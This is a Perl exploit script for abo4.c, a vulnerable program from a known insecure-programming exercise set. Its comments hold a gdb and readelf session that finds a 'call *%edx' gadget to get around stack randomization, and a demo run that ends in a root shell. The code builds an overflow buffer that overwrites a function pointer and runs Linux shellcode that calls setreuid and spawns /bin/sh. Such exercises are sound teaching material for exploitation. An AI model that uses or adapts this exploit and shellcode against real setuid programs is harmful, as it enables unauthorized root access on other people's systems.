#!/usr/bin/perl -w
use strict;
#
# [exp_rand_abo4.pl] Wed Apr  5 18:00:38 CEST 2006
#
# abo4.c exploit - Solution against stack randomization
# http://community.core-sdi.com/~gera/InsecureProgramming/abo4.c
#
# Copyright: bunker - http://rawlab.altervista.org
# 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2
#
# - Random stack workaround
# [Find "call *%edx" in memory]
#
# bunker@syn:~/abo$ gdb abo4
# (gdb) break main
# Breakpoint 1 at 0x80483ad
# (gdb) run
# Starting program: /home/bunker/abo/abo4
# Breakpoint 1, 0x080483ad in main ()
# (gdb) x/i 0xffffe000
# 0xffffe000:     jg     0xffffe047
# ...
# (gdb)
# 0xffffe74f:     call   *%edx
#
#
# [Find "fn" in .plt]
# 
# bunker@syn:~/abo4$ readelf -a abo4 | grep fn
#    126: 08049728     4 OBJECT  GLOBAL DEFAULT   22 fn
#    
#              
# bunker@syn:~/abo$ ls -al abo4
#  -rwsr-sr-x 1 root users 8340 2006-04-02 20:11 abo4
# bunker@syn:~/abo$ perl exp_rand_abo4.pl
#  sh-3.1# id
#   uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)


# call *%edx
my $ret = 0xffffe74f;

# "fn" in .plt
my $fn  = 0x08049728;

# shellcode
my $sc = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58".
	 "\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e".
	 "\x89\xe3\x52\x53\x89\xe1\xcd\x80";

# vulnerable file
my $vuln = "./abo4";

# build buffer
my $arg1 = pack("L",$fn)x68;
my $arg2 = pack("L",$ret);

# boom! :-D
exec $vuln, $arg1, $arg2, $sc;